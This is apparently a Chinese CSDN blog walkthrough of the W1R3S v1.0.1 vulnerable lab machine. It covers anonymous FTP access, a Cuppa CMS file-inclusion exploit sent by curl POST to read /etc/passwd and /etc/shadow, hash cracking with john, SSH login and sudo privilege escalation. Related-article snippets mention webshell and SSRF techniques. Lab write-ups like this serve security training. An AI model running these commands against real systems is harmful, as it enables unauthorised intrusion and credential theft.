w1r3s.v1.0.1靶机

最新推荐文章于 2024-08-07 22:31:29 发布
最新推荐文章于 2024-08-07 22:31:29 发布
阅读量271 收藏 4
点赞数 3
文章标签: php 服务器 运维 网络 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71232352/article/details/140964613
版权

信息收集

1.查看靶机的mac地址并把网络连接模式改为nat

2.主机发现

3.端口扫描

4.访问它的80端口

5.没有发现什么有用信息,扫描目录

6.突然想到他开启的21端口匿名用户连接尝试,用户名密码都为Anonymous发现连接成功

7.将ftp上的所有txt文件都使用mget命令下载到kali上

8.查看所有下载下来的文件并没有发现什么有用的信息,拼接目录扫描的接口,发现/administrator和/wordpress/javascript进行拼接

9.发现没有什么太大的收获

getshell

1.突然在title处发现了cuppa cms这个信息,通过kali搜索

searchsploit cuppa

2.发现了一个远程文件包含漏洞将他下载下来

searchsploit cuppa cms -m 25971.txt

3.查看它

4.图中有一行是:

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

url中的target应该就是靶机的ip,我们换为192.168.200.139试试,浏览器访问:http://192.168.42.188/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

5.发现路径不存在寻找其他路径

6.使用curl命令提交Post请求: , 成功得到目标主机的passwd文件内容

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.42.188/administrator/alerts/alertConfigField.php

7.获取目标主机的shadow文件: 这里可以看到两处很明显的用户信息

curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.42.188/administrator/alerts/alertConfigField.php

8.将shadow文件内容复制到hash.txt中, 然后使用john命令进行破解:john hash.txt

9.远程连接

ssh w1r3s@192.168.42.188

提权

1.查看当前用户的权限:sudo -l

2.发现是all直接sudo su

3.成功提权

左提溜
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
minikube-v1.0.1.iso.zip
05-16
- 下载"minikube-v1.0.1.iso.zip"压缩包并解压,得到"minikube-v1.0.1.iso"。 - 安装虚拟化软件,如VirtualBox或Hyper-V。 - 如果你选择Hyper-V,需要在Windows功能中启用它,并确保你的硬件支持虚拟化技术。 2....
EA.Mobile.FIFA.09.v1.0.1.S60v3
12-17
《EA.Mobile.FIFA.09.v1.0.1.S60v3》是一款由著名游戏开发商Electronic Arts(简称EA)推出的移动版FIFA 09足球游戏,专为S60v3平台设计,支持Symbian OS 9操作系统。这款游戏在手机平台上提供了与家用主机和PC版...
jmeter.backendlistener.kafka-1.0.1.jar
08-23
jmeter后端侦听器kafka 一个JMeter插件,使您可以将测试结果发送到Kafka服务器
zTouch:Zepto.js v1.0.1 touch extend (Zepto.js v1.0.1 swipetouch扩展)
06-13
* Zepto.js v1.0.1 touch extend (Zepto.js v1.0.1 swipe/touch扩展) Zepto.js v1.0.1版本的touch.js模块引入使用后会导致页面很卡的情况,所以开发了一个新的扩展插件来替换其touch.js。已经过Android/ios测试。 * ...
WEB渗透Web突破篇-SSRF
qq_59468567的博客
08-03 935
转码服务 在线翻译 获取超链接的标题等内容进行显示 请求远程服务器资源的地方,图片加载与下载(通过URL地址加载或下载图片) 图片、文章收藏功能 对外发起网络请求的地方,网站采集、网页抓取的地方。 头像 (远程加载头像) 一切要你输入网址的地方和可以输入ip的地方。 数据库内置功能(mongodb的copyDatabase函数) 邮件系统 文件处理 在线处理工具 从URL关键字中寻找:share、wap、url、link、src、source、target、u、3g、display、sourceURl、im
LNMP环境搭建论坛
最新发布
qq_63652578的博客
08-07 673
root@Rocky8-node1 ~]# mv upload/* /usr/share/nginx/html/ #把upload下的所有内容移动到/usr/share/nginx/html/[root@Rocky8-node1 ~]# sed -i '/^group =/ c \group = nginx' /etc/php-fpm.d/www.conf #将组改为nginx。
phpadmin管理系统
qq_70836100的博客
08-04 108
set global general_log_file = 'C:/phpStudy/PHPTutorial/WWW/mafa.php' //修 改⽇志的保存位置。
常见的CMS漏洞
C233333235的博客
08-03 542
通过⽇志⽂件拿Shell 利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改 这个存放位置,并且可以修改它的后缀名。查到数据库位置后,就可以大概猜测一下网站的根目录,一般www目录在phpstudt_pro下,是Extensions的同级目录。以确认我们的修改生效了,修改成功后,日志文件的后缀就被修改成了php,那么其中的php语句就会被运行。这样日志文件中就会有这个一句话木马的字样,我们去访问日志文件后,就可以进行连接获取shell。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1046
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
ctfhub文件包含
a666666688的博客
08-07 303
文件的内容,通常这个文件包含一些敏感信息,比如CTF比赛中的flag。这样就可以通过浏览器或其他HTTP客户端看到。,直接访问这个URL将导致服务器读取并返回。
[图解]SysML建模电磁轨道炮-01块定义图
rolt的专栏
08-04 949
它这个轨道炮领域跟这两个Actor
xss漏洞(二,xss靶场搭建以及简单利用)
2302_80280669的博客
08-02 452
使用工具:PHP study,dvwa靶场。
【溯源反制】反制攻击者-蚁剑低版本
qq_39972370的博客
08-03 604
低版本中国蚁剑存在 XSS 漏洞,该漏洞是因为在 webshell 远程连接失败时,中国蚁剑会返回错误信息,但因为使用的是 html 解析,导致 xss 漏洞。 所以可以在防守方部署网站,诱导攻击方上传木马文件,攻击方使用蚁剑连接。防守方对木马文件进行更改,利用 nc工具获取到攻击方的shell权限。
nginx和php工具的使用
m0_71483678的博客
08-07 478
1、查看本地缓存,命令:ipconfig /displaydns2、如果没有查到A记录,查host文件,根域服务器会告诉你去找.com顶级域的dns服务器去解析,然后.com的服务器又把baidu.com的dns地址告诉你,最终找到baidu.com的dns,并且查询到对应服务器的IP,然后返回给你的路由器,最后再返回给你(迭代查询)成功用域名www.ouya.com访问到了demo.html网页!
PHP同城派送系统小程序源码
2401_84414018的博客
08-06 390
同城派送系统,用科技的力量缩短城市的距离,让我们的生活更加便捷、高效。无论是忙碌的工作日还是悠闲的周末时光,它都能成为你生活中不可或缺的一部分,让你的每一刻都触手可及。🎉🚀。
vulhub:Apache解析漏洞apache_parsing
weixin_68416970的博客
08-01 549
vulhub漏洞复现:Apache解析漏洞apache_parsing
Bugku-web-eval
weixin_57524749的博客
08-01 149
函数用于将传入的字符串作为 PHP 代码执行,在这个场景中,直接使用用户输入的。用hello传参打开文件flag.php找到flag。
关于企微群聊天工具功能的开发---PHP+JS+CSS+layui (手把手教学)
最美不过下雨天
08-01 426
php+js开发企业微信
v1.0.1.bin
08-12
v1.0.1.bin是一个文件的命名,它的名称中以“v1.0.1”表示版本号,后缀“.bin”表示二进制文件的格式。 版本号“v1.0.1”通常用于软件或程序的版本控制,它表示该版本是在第一个主要版本(v1)的基础上进行的更新,次要版本(0)表示更小的变动或修复,补丁版本(1)表示更小的更新或修复。 后缀“.bin”表示这是一个二进制文件。二进制文件储存的是机器语言代码,可以在计算机上直接执行。与文本文件不同,二进制文件不以可读的字符形式呈现,而是一连串的01二进制数据,其中包含了程序的指令和数据。 在软件开发中,通过不同的版本号和文件格式的命名,可以方便地标识和管理不同的软件版本或文件类型。v1.0.1.bin可能是某个软件的特定版本的二进制文件,用于安装、更新或运行该软件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值